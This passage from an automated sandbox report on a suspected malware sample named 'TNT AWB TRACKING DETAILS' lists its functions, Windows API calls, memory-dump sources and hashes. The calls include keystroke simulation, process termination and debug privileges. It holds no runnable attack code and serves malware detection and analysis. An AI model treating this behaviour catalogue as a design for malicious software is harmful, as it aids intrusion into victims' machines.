                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 4fc6d487dfd204a4afde8fbc46f15d852bfaa65fb690e454568093c18ff11a1c
                                                    • Instruction ID: d90cf3c4321fbfad99b8e2b211ae22aee736103d2e7980f80e31475a356946a9
                                                    • Opcode Fuzzy Hash: 4fc6d487dfd204a4afde8fbc46f15d852bfaa65fb690e454568093c18ff11a1c
                                                    • Instruction Fuzzy Hash: B2E1A031A043419FCB14EF24C981B6ABBE1EF85364F14856DF8999B3A2CB31DC49DB52
                                                    Function 00F24CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F23697,?), ref: 00F2468B
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F23697,?), ref: 00F246A4
                                                      • Part of subcall function 00F24A31: GetFileAttributesW.KERNEL32(?,00F2370B), ref: 00F24A32
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F24D40
                                                    • _wcscmp.LIBCMT ref: 00F24D5A
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F24D75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 4de987bc212ec269c2658277472ed63cc4702e57ec6c17f8c2379ef0479d268e
                                                    • Instruction ID: ba006d13dd801ef8325a07d297aa86b3ecca9343dffbb5b514a9e900d2c97c54
                                                    • Opcode Fuzzy Hash: 4de987bc212ec269c2658277472ed63cc4702e57ec6c17f8c2379ef0479d268e
                                                    • Instruction Fuzzy Hash: 1F5183B24083949BC724DB60DC81EDBB7ECAF85350F40092EF689D3151EE75B188DB56
                                                    Function 00F48645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F486FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 0b0b50b93506315ab27f628b7c2eb7cb30e371dfb220c6d5ffa444a7f4754025
                                                    • Instruction ID: 37914085b26bfd7eb84dd9058ae5af0dc7dad4f28db67a72a3163bcc7ade3eee
                                                    • Opcode Fuzzy Hash: 0b0b50b93506315ab27f628b7c2eb7cb30e371dfb220c6d5ffa444a7f4754025
                                                    • Instruction Fuzzy Hash: A5519231900248BFEB249B24CC85FAD7FA4AB057A0F604115FD15E62E1DF76AD82FB51
                                                    Function 00EC2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EFC2F7
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EFC319
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EFC331
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EFC34F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EFC370
                                                    • DestroyIcon.USER32(00000000), ref: 00EFC37F
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EFC39C
                                                    • DestroyIcon.USER32(?), ref: 00EFC3AB
                                                      • Part of subcall function 00F4A4AF: DeleteObject.GDI32(00000000), ref: 00F4A4E8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: d4773e09583835220c0dac5c2b578738491bf34368b0b5a1e9dbeab2d26982c3
                                                    • Instruction ID: 6844e3b499b90533abc69d0947531f300b5b3dc22f145ca89bcb69021535e665
                                                    • Opcode Fuzzy Hash: d4773e09583835220c0dac5c2b578738491bf34368b0b5a1e9dbeab2d26982c3
                                                    • Instruction Fuzzy Hash: A551AB34600209AFDB24DF24CD41FAA7BF5EB18714F20552CFA06A72A0DB71AC91EB60
                                                    Function 00F1966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F1A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1A84C
                                                      • Part of subcall function 00F1A82C: GetCurrentThreadId.KERNEL32 ref: 00F1A853
                                                      • Part of subcall function 00F1A82C: AttachThreadInput.USER32(00000000,?,00F19683,?,00000001), ref: 00F1A85A
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1968E
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F196AB
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F196AE
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F196B7
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F196D5
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F196D8
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F196E1
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F196F8
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F196FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 95c5f5dfee6c733917d16e02d3a94df0853bbfd31c97530c5c840260409a209e
                                                    • Instruction ID: ea017ecbff680381b250b7135de6d930911e0c9cf4e8a51124938a7499a1bba5
                                                    • Opcode Fuzzy Hash: 95c5f5dfee6c733917d16e02d3a94df0853bbfd31c97530c5c840260409a209e
                                                    • Instruction Fuzzy Hash: 2711E575910218BEF6106F60DC49FAA3B5DDB4D760F110425F648AB0A1C9F25C50EAA4
                                                    Function 00F18921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F1853C,00000B00,?,?), ref: 00F1892A
                                                    • HeapAlloc.KERNEL32(00000000,?,00F1853C,00000B00,?,?), ref: 00F18931
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F1853C,00000B00,?,?), ref: 00F18946
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F1853C,00000B00,?,?), ref: 00F1894E
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F1853C,00000B00,?,?), ref: 00F18951
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F1853C,00000B00,?,?), ref: 00F18961
                                                    • GetCurrentProcess.KERNEL32(00F1853C,00000000,?,00F1853C,00000B00,?,?), ref: 00F18969
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F1853C,00000B00,?,?), ref: 00F1896C
                                                    • CreateThread.KERNEL32(00000000,00000000,00F18992,00000000,00000000,00000000), ref: 00F18986
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 99eed51b36c62c4fd37c1244f502c5cde8f6a071dbb2def7de6e97d9f817400e
                                                    • Instruction ID: 9d1043ff9f32ec255d0cfb66a4f9505b124f6421ab1eb67474e2637e6f3e6f0e
                                                    • Opcode Fuzzy Hash: 99eed51b36c62c4fd37c1244f502c5cde8f6a071dbb2def7de6e97d9f817400e
                                                    • Instruction Fuzzy Hash: B501BF79640348FFE710ABA5DC4DF673BACEB99711F404421FA09DB291CA709804DB21
                                                    Function 00F39B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: 4bf75837a7976f002fbeda5f15ec49625490325c5e86fd68c3b03ea89f718b02
                                                    • Instruction ID: b8897db2bc01bf5aa46e6ecc9174b14e2da44d964403ad5c69561c61afd0e656
                                                    • Opcode Fuzzy Hash: 4bf75837a7976f002fbeda5f15ec49625490325c5e86fd68c3b03ea89f718b02
                                                    • Instruction Fuzzy Hash: 6CC1B371E0421A9FDF10DF98D885BAEB7F5FB48364F148429E905A7280E7F09D85DB60
                                                    Function 00F39113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-625585964
                                                    • Opcode ID: cb2c4271af2cda27e368b9004b1c4fc054602c409f3bd357613c4bd2907490c0
                                                    • Instruction ID: e68198bd9176476e9dc7f8aab50205491e2240dcaa2b61258a4dfe3430fb6256
                                                    • Opcode Fuzzy Hash: cb2c4271af2cda27e368b9004b1c4fc054602c409f3bd357613c4bd2907490c0
                                                    • Instruction Fuzzy Hash: 67917B71E04219ABDF24DFA5C848FAFBBB8EF45720F108119F915AB290D7F09945DBA0
                                                    Function 00F3975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F1710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?,?,00F17455), ref: 00F17127
                                                      • Part of subcall function 00F1710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17142
                                                      • Part of subcall function 00F1710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17150
                                                      • Part of subcall function 00F1710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?), ref: 00F17160
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F39806
                                                    • _memset.LIBCMT ref: 00F39813
                                                    • _memset.LIBCMT ref: 00F39956
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F39982
                                                    • CoTaskMemFree.OLE32(?), ref: 00F3998D
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 00F399DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: aa7e4290ca0daa5494fb894cd154db962ce0de511757bd59322c263eac1a0a17
                                                    • Instruction ID: 0bd4b36f490584de7e5013dd8dd95d16c28109967319d6e0e6c7c27b42359bd8
                                                    • Opcode Fuzzy Hash: aa7e4290ca0daa5494fb894cd154db962ce0de511757bd59322c263eac1a0a17
                                                    • Instruction Fuzzy Hash: 77915871D04229EBDB10DFA5DC40EDEBBB9AF48320F10415AF519A7281DBB1AA45DFA0
                                                    Function 00F46D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F46E24
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F46E38
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F46E52
                                                    • _wcscat.LIBCMT ref: 00F46EAD
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F46EC4
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F46EF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 3a748da0295b7195e5faab3c0adf756974a3dac4c7a3dbaed6ccb7966c8cc89c
                                                    • Instruction ID: b2b1ac13693072a1c484f0b0237ebdb00e4f6215c7fddc664831d7c56892bab0
                                                    • Opcode Fuzzy Hash: 3a748da0295b7195e5faab3c0adf756974a3dac4c7a3dbaed6ccb7966c8cc89c
                                                    • Instruction Fuzzy Hash: 7E41C374A00348ABEB219F64CC85BEE7BF8EF09360F10442AF988E7291D6719D849B51
                                                    Function 00F3E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00F23C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F23C7A
                                                      • Part of subcall function 00F23C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F23C88
                                                      • Part of subcall function 00F23C55: CloseHandle.KERNEL32(00000000), ref: 00F23D52
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F3E9A4
                                                    • GetLastError.KERNEL32 ref: 00F3E9B7
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F3E9E6
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F3EA63
                                                    • GetLastError.KERNEL32(00000000), ref: 00F3EA6E
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F3EAA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: fe9cdbf6ddc18e649a8694fb8d2ad9fa8484c2ddc24345068d511f1a8c4be1e4
                                                    • Instruction ID: a67e7656fdd37c9e5684717eb07065b170723f5c9d8b7ff4282a17aa8acd2f05
                                                    • Opcode Fuzzy Hash: fe9cdbf6ddc18e649a8694fb8d2ad9fa8484c2ddc24345068d511f1a8c4be1e4
                                                    • Instruction Fuzzy Hash: 9241CD726002019FDB14EF14CC95FAEB7E5AF41324F18841DF906AB3C2CB79A849EB91
                                                    Function 00F22F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F23033
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: b40fc0c519984ba5f6fa14da7ef5183c019e684cfecf4e65455ef8402e4e4876
                                                    • Instruction ID: 92799216853efad3989e359531c70499354aaa06252c8dda4dde84e74f45d68a
                                                    • Opcode Fuzzy Hash: b40fc0c519984ba5f6fa14da7ef5183c019e684cfecf4e65455ef8402e4e4876
                                                    • Instruction Fuzzy Hash: 92115B727883AABEE715DA14EC42D6B779C9F19374B10002AFA04A6181DB789F0075BA
                                                    Function 00F242F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F24312
                                                    • LoadStringW.USER32(00000000), ref: 00F24319
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F2432F
                                                    • LoadStringW.USER32(00000000), ref: 00F24336
                                                    • _wprintf.LIBCMT ref: 00F2435C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F2437A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F24357
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 3ebea84b8b3ae4c9f1ef991ca7806e62820169a15324069ba1657676d232b001
                                                    • Instruction ID: b9b31e32752d8785fa4c3b369a1904865fe1dd12a8232a9232abf99d9adecf6a
                                                    • Opcode Fuzzy Hash: 3ebea84b8b3ae4c9f1ef991ca7806e62820169a15324069ba1657676d232b001
                                                    • Instruction Fuzzy Hash: 00018FF690021CBFE710D7A0DD89EE7776CDB08300F4001A1BB09E2012EA719E896B71
                                                    Function 00F4D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC2612: GetWindowLongW.USER32(?,000000EB), ref: 00EC2623
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00F4D47C
                                                    • GetSystemMetrics.USER32(0000000F), ref: 00F4D49C
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F4D6D7
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F4D6F5
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F4D716
                                                    • ShowWindow.USER32(00000003,00000000), ref: 00F4D735
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F4D75A
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F4D77D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: b4c2f22bfd58c8c9fda374e4f592e97cd11d37b5031afb54cafa01f5b4214204
                                                    • Instruction ID: d3147216547d4d003a30bf64ce3585beaf58639369f3acf1657214f63c985e0b
                                                    • Opcode Fuzzy Hash: b4c2f22bfd58c8c9fda374e4f592e97cd11d37b5031afb54cafa01f5b4214204
                                                    • Instruction Fuzzy Hash: 52B18B75A00229EFDF14CF68C9C57AD7BB1FF04721F098069EC489B295DB34A954EB90
                                                    Function 00EC2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000), ref: 00EC2ACF
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00EFC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00EC2B17
